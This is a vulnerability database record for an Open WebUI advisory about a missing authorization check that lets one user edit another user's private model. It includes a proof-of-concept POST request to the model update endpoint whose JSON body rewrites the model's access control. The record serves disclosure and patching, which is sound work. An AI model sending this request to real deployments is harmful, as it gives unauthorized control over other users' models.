{"id":"CVE-2026-45345","aliases":["GHSA-gm54-m39w-grjp","PYSEC-2026-2727"],"title":"Open WebUI missing authorization check at the model update function - models from other users can be updated","summary":"Open WebUI missing authorization check at the model update function - models from other users can be updated","severity":"medium","cvss":6.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","vendor":"open-webui","product":"open-webui","ecosystem":"pip","affected":["open-webui < 0.5.7"],"patched":["open-webui 0.5.7"],"published":"2026-05-14","updated":"2026-07-13","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-gm54-m39w-grjp","references":[{"url":"https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45345"},{"url":"https://github.com/open-webui/open-webui"}],"tags":["osv","pip"],"epss":0.00226,"epssPercentile":0.13574,"ingestedAt":"2026-07-13T18:57:58.475Z","slug":"CVE-2026-45345","body":"## Overview\n\n### Summary\nA user can modify another user's model even if its visibility is set to `Private`.\nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details / PoC\nThe user `Victim` created a private model with the visibility set to `private`: \n![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)\n\nThe user `Attacker` can edit this model using the following POST request:\n```\nPOST /api/v1/models/model/update?id=aaabraaa HTTP/2\nHost: domain.local\n//Some headers removed\nTe: trailers\n\n{\"id\":\"aaabraaa\",\"base_model_id\":\"gpt-4o-POC\",\"name\":\"testmodel\",\"meta\":{\"profile_image_url\":\"/static/favicon.png\",\"description\":\"\",\"capabilities\":{\"vision\":true,\"usage\":false,\"citations\":true},\"suggestion_prompts\":null,\"tags\":[],\"toolIds\":[\"test\"]},\"params\":{},\"user_id\":\"565c82e6-083f-42bb-bf0f-a4e214cfb9ad\",\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}},\"is_active\":true,\"updated_at\":1737314575,\"created_at\":1737121281}\n```\nRequest / Response\n![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)\n\n### Impact\nA user can modify another user's model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.\n\n## Affected packages\n\n- `open-webui < 0.5.7`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `open-webui 0.5.7`","depth":"sunlit","depthScore":36,"depthScoreParts":{"impact":35.8,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}